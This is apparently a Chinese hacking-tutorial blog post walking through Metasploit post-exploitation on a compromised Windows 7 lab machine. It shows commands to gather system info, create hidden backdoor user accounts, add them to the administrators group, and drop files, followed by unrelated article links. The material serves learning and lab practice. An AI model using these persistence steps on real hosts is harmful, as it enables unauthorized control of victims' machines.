课前声明：
本分享仅做学习交流 ， 请自觉遵守法律法规！搜索：Kali与编程 ， 学习更多网络攻防干货！下篇文章将在明天下午五点发布 ， 敬请关注！
文章插图
正文部分
一、背景介绍
Metasploit就是一个漏洞框架 。 它的全称叫做The Metasploit Framework ， 简称叫做MSF 。 Metasploit作为全球最受欢迎的工具 ， 不仅仅是因为它的方便性和强大性 ， 更重要的是它的框架 。 它允许使用者开发自己的漏洞脚本 ， 从而进行测试 。 Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个 。
3.安装好的Kali Linux虚拟机一台 。
3、 战略安排
3.1 对拿下的Windows主机进入后渗透阶段 ， 具体操作如下图所示 。
步骤1：运行漏洞利用模块 ， 如下图所示 。
命令：run
文章插图
步骤2：进入Windows主机的cmd窗口 ， 如下图所示 。
文章插图
步骤3：利用命令查看受害者主机的系统信息 ， 知己知彼对目标受害者主机进行更全面的掌握 ， 更全面的控制目标主机 ， 获取更全面的信息 ， 如下图所示 。
命令：systeminfo
文章插图
步骤4：受害者主机的系统信息如下图所示 。
文章插图
3.2 对受害者主机进行用户管理操作 ， 如下图所示 。
步骤1：给受害者主机添加可以隐藏的用户信息 ， 如下图所示 。
命令：net user 新用户名$ 用户密码 /add
例子：net user admin$ 12456 /add
文章插图
步骤2：查看刚才添加的新用户 ， 如下图所示 。
命令：net user(因为新建的用户为隐藏用户 ， 所以命令行查看不到该用户）
步骤3：添加不隐藏的新用户 ， 如下图所示 。
命令：net user 新用户名 用户密码 /add
例子：net user admin 12456 /add
文章插图
步骤4：查看刚才添加的新用户 ， 如下图所示 。
命令：net user
文章插图
步骤5：在受害者主机中利用图形化界面查看刚才新建的用户 ， 可见在该界面是可以看见新建的隐藏用户的（如果需要实现真正意义上的隐藏用户的话需要更改注册表 ， 请持续关注本号后续讲解）
文章插图
步骤6：删除用户 ， 如下图所示 。
命令：net user 用户名 /del
例子：net user admin /del
文章插图
步骤7：将新建的用户添加到管理员组 ， 如下图所示 。
命令：net localgroup administrators /add
文章插图
步骤8：查看管理员组的用户 ， 如下图所示 。
命令：net localgroup administrators
文章插图
3.3 对受害者主机进行文件操作 ， 如下图所示 。
步骤1：新建文件夹
命令：md 文件名
例子：md abc
文章插图
步骤2：删除文件夹
命令：rd 文件名
例子：rd abc
文章插图
步骤3：新建文本文件 ， 如下图所示 。
命令：echo 文本文件内容 > 文件名
例子：echo hi you are hacked > hk.txt
文章插图
3.4 对受害者主机进行查看主机名操作 ， 如下图所示 。
命令：hostname
文章插图
文章插图
PS：到此学习完毕 ， 谢谢观看 ， 获取更多干货请持续关注本号！

• 工程师|AWS偏爱Rust，已将Rust编译器团队负责人收入囊中
• 物流|“后疫情时代”什么值得投资？英国最大资管看好网络安全和物流行业
• 项目|明朝万达获“网络安全技术应用试点示范项目”授牌
• 喻波|明朝万达喻波受邀参加2020年中国网络安全高峰论坛
• 推荐Java工程师必看，12个Hadoop领域的上手项目
• 腾讯数据工程师推荐的Python新手入门书籍，还是首发电子版
• 腾讯游戏开发工程师：Linux 机器 CPU 毛刺问题排查
• 船舶|挪威船东协会明年起向船东提供“船舶网络安全”保险
• IT工程师都需要掌握的容器技术之Docker容器管理
• 江苏|2020江苏网络安全发展大会在无锡召开